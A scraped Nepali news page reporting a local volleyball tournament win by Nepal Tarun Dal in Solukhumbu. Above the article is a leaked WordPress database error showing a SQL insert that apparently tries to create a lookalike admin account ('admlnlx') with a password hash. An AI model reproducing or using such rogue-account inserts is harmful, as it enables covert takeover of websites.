WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BChH.W4Hp2pbjkdogsvuWF9S6ZwIfV0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:07:11', '', 'admlnlx', 'admlnlx')

नेपाल तरुण दललाई भलिबल प्रतियोगिताको उपाधि – Gaule Khabar

नेपाल तरुण दललाई भलिबल प्रतियोगिताको उपाधि

नेपाल तरुण दललाई भलिबल प्रतियोगिताको उपाधि

सोलुखुम्बु । सोलुखुम्बुको थुलुङ दुधकोशी गाँउपालिका-९ लोखिममा भएको खुल्ला पुरुष भलिवल प्रतियोगिताको उपाधि नेपाल तरुण दल थुलुङ दुधकोसीले हात पारेको छ ।

सोलुखुम्बु फ्याफुल्ला समाजको आयोजनामा बुधबारदेखि जारी प्रतियोगितामा ऐसेलुखर्क गाँउपालिका ५ महेश्वरीे दोश्रो र थुलुङ दुधकोशी गाँउपालिका ९ लोखिम ए टिम तेश्रो बनेको छ ।

प्रतियोगितामा प्रथम, द्धितिय र तृतिय हुने टिमलाई क्रमश ५० हजार, ३० हजार र २० हजार प्रदान गरिएको छ । यस्तै नेपाल तरुण दलका खेलाडी सहिल मगर उत्कृष्ट खेलाडी घोषित भएको  अम्बिरकजी तामाङले जानकारी दिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका